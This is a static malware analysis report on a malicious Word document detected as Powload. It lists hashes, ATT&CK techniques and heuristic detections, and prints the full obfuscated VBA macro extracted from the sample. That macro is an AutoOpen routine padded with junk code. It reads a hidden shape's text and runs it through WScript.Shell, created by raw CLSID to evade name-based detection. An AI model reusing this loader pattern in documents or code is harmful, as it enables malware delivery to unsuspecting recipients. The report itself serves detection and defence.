Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8835101ef9d1a985…

MALICIOUS

Office (OLE)

141.9 KB Created: 2018-11-28 06:44:00 Authoring application: Microsoft Office Word First seen: 2019-02-26
MD5: 794992e6481e9d3cea30cd029b11602f SHA-1: fd82d802a40ea5213a1189a05bdd10e7c174089c SHA-256: 8835101ef9d1a98559c559e0033210e309f98bfce6bc0883f2016e2eed70ab2e
252 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.005 Visual Basic T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The macros utilize the dangerous CLSID for WScript.Shell and reference PowerShell, indicating an attempt to download and execute a second-stage payload. The AutoOpen macro and GetObject calls further support this malicious intent. The ClamAV detection confirms its classification as malware.

Heuristics 9

  • ClamAV: Doc.Malware.Powload-6809722-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Powload-6809722-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUS
    VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
    Matched line in script
    Next
Set wbDRPFLl = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + ViRjYvaid + MwOOBQ + GBDXcMtSF + soMziqAA)
   On Error Resume Next
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Next
Set wbDRPFLl = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + ViRjYvaid + MwOOBQ + GBDXcMtSF + soMziqAA)
   On Error Resume Next
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6451 bytes
SHA-256: ee286bd55db9b5be499e31daf1fa8551c473818bbc743f3affa2d0f094f3cbab
Detection
ClamAV: No threats found
Obfuscation or payload: likely
130 of 217 identifiers look randomly generated (e.g. 'faUYpYZUpUK') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "faUYpYZUpUK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
Select Case OSrtS
      Case 255674312
         pBXaaJWzt = CBool(CQhXarTPj)
         QhkakUP = 180620499
      Case 331298590
         nWrwN = Atn(KZFrqvR)
         Kdojna = Atn(158734400 * CLng(200099172))
   End Select
         For Each PjIQzqGu In BnFjYkKDj
         JpjUPUPGf = oXhJkcQF * CDate(Njzwv * iLiFEZjui) * wiLswij / Sin(OGdFvwv) / EwTKJs + 245907704 - 178023492 + Chr(241812794) + (kAaFE * DontEMJ)
Next
   On Error Resume Next
Select Case cjwUEVjQ
      Case 157674506
         mPWIZIV = CBool(wmHZtAZ)
         vvsKYiwSi = 161949798
      Case 33453396
         nTIvNkJwp = Atn(ciUGWPcC)
         vuIalYNAE = Atn(107944478 * CLng(27998458))
   End Select
         For Each BDbqddM In JrdGLS
         pSLip = iJzftXW * CDate(jFflGbitQ * lPqjERBOS) * YithOB / Sin(ubKkGp) / ZlzUEr + 208116454 - 316745162 + Chr(10949562) + (wZlCEh * iFIbBLw)
Next
   On Error Resume Next
Select Case HJizRcpmi
      Case 47064681
         EGEvimkqD = CBool(uUiCbc)
         IUihk = 34054576
      Case 85277484
         miqjXP = Atn(TzhkYAbn)
         lkcNozu = Atn(275870058 * CLng(342282938))
   End Select
         For Each dJYQUBrk In HuKfELBkV
         DEhhMvzcz = nkAjmlY * CDate(hMjhPffba * XCnOY) * wjwcLUUYs / Sin(IXuitT) / GCIIWoBB + 242769668 - 138026061 + Chr(306157253) + (whYLB * FowiNsKo)
Next
Set IkRFJ = Shapes("iRNTTkEX")
   On Error Resume Next
Select Case osuYXCit
      Case 295018429
         sVjKrnwk = CBool(TpJVEj)
         mWGmEplQ = 78682907
      Case 283984609
         FYGnG = Atn(LssMJn)
         AjStriWq = Atn(289466166 * CLng(251394752))
   End Select
         For Each HmGiDj In wAmsML
         juJLnYci = lVWrYh * CDate(KOmqfT * hpJtL) * BIWGNIjM / Sin(ENnYUVJ) / ruRfbiaV + 6094030 - 100801838 + Chr(257139180) + (WiiRvRc * PiPzIjJYC)
Next
lHvBmAR = "" + lMtwjHZi + XIRzuIZ + CsKRMfT + IkRFJ.TextFrame.TextRange.Text + UBTuPAEO + WmrwBiR
   On Error Resume Next
Select Case NnGMz
      Case 289682474
         tfYmj = CBool(lzEEKLHm)
         bkiAK = 279685323
      Case 261578473
         EsDpzGC = Atn(vRPFqKY)
         fhGmT = Atn(326775517 * CLng(339107201))
   End Select
         For Each PFMWhzhN In JTtdw
         tCiOusjR = LYUdkA * CDate(GtOas * jrwkBAhri) * jtNkojF / Sin(inwKIiDdE) / MAPWv + 334207773 - 145874307 + Chr(254601907) + (KqjjYh * lkXQOXnRr)
Next
Set wbDRPFLl = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + ViRjYvaid + MwOOBQ + GBDXcMtSF + soMziqAA)
   On Error Resume Next
Select Case zZEmp
      Case 342235524
         qjAIs = CBool(iGGPwolb)
         zqzcslvwr = 20137050
      Case 227462030
         qmMzQi = Atn(pnimdv)
         EUXDGihz = Atn(187876579 * CLng(91969560))
   End Select
         For Each MHOvhIFK In oTuPiJ
         mKODThI = bbowzirK * CDate(KDXwtGahT * wkZHUwJ) * oOKVfzjUG / Sin(IKowJw) / fmasE + 263307888 - 148762357 + Chr(2765764) + (LwBTT * qjCvo)
Next
   On Error Resume Next
Select Case YQdqHjS
      Case 142490304
         UzkjG = CBool(FPoiFN)
         mivZifs = 271971788
      Case 192246761
         bPuWW = Atn(MYbsHv)
         dcNsb = Atn(228125501 * CLng(21767869))
   End Select
         For Each GHDdvuhw In dLroJRMq
         zbKdVNrZ = zVmQGZ * CDate(UHqsbYi * oPwDUTL) * CslbX / Sin(mqmVbkc) / MEROp + 62540871 - 139942869 + Chr(328867259) + (YwkpG * nFwmUk)
Next
   On Error Resume Next
Select Case mopaHh
      Case 184208085
         wdbFmS = CBool(dvnOqaWYG)
         TsDhVUCHw = 198218374
      Case 296527078
         mHQoCq = Atn(TXmLiDBz)
         qtQQid = Atn(258243970 * CLng(270291853))
   End Select
         For Each icJYzqo In KIjwCYfln
         hjZiUVl = COckJT * CDate(PUNiuav * hssTSoV) * ivDFIzEI / Sin(njoaUazM) / mDRHtzm + 63194703 - 290506160 + Chr(248818879) + (CScjdwo * OTQQF)
Next
Const KXjopJqQVC = 0
   On Error Resume Next
Select Case tFfdnWd
      Case 212846971
         kiWMWM = CBool(DqLtHd)
         zVzOGEt = 154974443
      Case 89581097
         ITCwYjs = Atn(HZQSJK)
         rdEFzlT = Atn(103153478 * CLng(179759807))
   End Select
         For Each HqIXbWNQ In ECKOfGThz
         NhMmm = boSNrp * CDate(aQQtk * jCDCQGYh) * YwjDTL / Sin(wvEVIA) / uCBPwjzO + 89526417 - 232952097 + Chr(292991030) + (BKivjO * LPThnVsN)
Next
   On Error Resume Next
Select Case wWQHG
      Case 281533608
         iiAzU = CBool(nRMczLc)
         oRjTq = 317670696
      Case 82011226
         jmXWMjWHM = Atn(ziTAh)
         TIEoWIbKH = Atn(49282546 * CLng(64330135))
   End Select
         For Each hoQuq In vNZwPHuEP
         OzjokrAhr = UaKNOEW * CDate(ZYoCoc * TSUtz) * StjvJYVTq / Sin(iDSVUDMj) / lcirGM + 64530750 - 42321749 + Chr(235915176) + (ZjotiC * dSFjBwjk)
Next
   On Error Resume Next
Select Case TQCoa
      Case 52318282
         TvqWNITv = CBool(NKMilczm)
         CwQJNSk = 13316685
      Case 179219173
         uvzujNHHw = Atn(qPiEnXiT)
         XrQQM = Atn(158367170 * CLng(73891497))
   End Select
         For Each KhYlLhT In lNQcU
         VCHmmOM = qnRzEId * CDate(nWYpzZYt * hOCCJOqk) * WNJalwLor / Sin(UOdLYFat) / ffviN + 44073096 - 35321928 + Chr(427502) + (TjZaM * mPWNl)
Next
wbDRPFLl.Run# lHvBmAR, KXjopJqQVC
   On Error Resume Next
Select Case ZZospa
      Case 18887246
         wiwhs = CBool(CadZYwFvr)
         ESOODz = 105256314
      Case 201604603
         zRzpf = Atn(SWOLwpESv)
         AzWRSJiib = Atn(263502686 * CLng(146316986))
   End Select
         For Each oGwSRc In dCkzbGZrk
         WzASQCBtN = nnROrbFh * CDate(MiYbW * vPAuLs) * tnEoVt / Sin(DwYEpHq) / WFAAsjYP + 334424024 - 160649701 + Chr(193652373) + (UmBzC * VudKDFLJE)
Next
   On Error Resume Next
Select Case vRcMqi
      Case 266785043
         qMGFcnsva = CBool(LSlCwMo)
         ZEHWKYP = 128551712
      Case 224587378
         dnWFKBJ = Atn(pAEaV)
         cMtvitTQ = Atn(157757019 * CLng(93051126))
   End Select
         For Each kqUBh In JFPSnzGIk
         rXoXziXuz = TpoJMPI * CDate(aLpFHKvUG * oNnnuB) * tjqJBSZ / Sin(DXTQF) / YrKiY + 15593671 - 253279695 + Chr(102231417) + (bibGFkr * vnhTfRnY)
Next
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.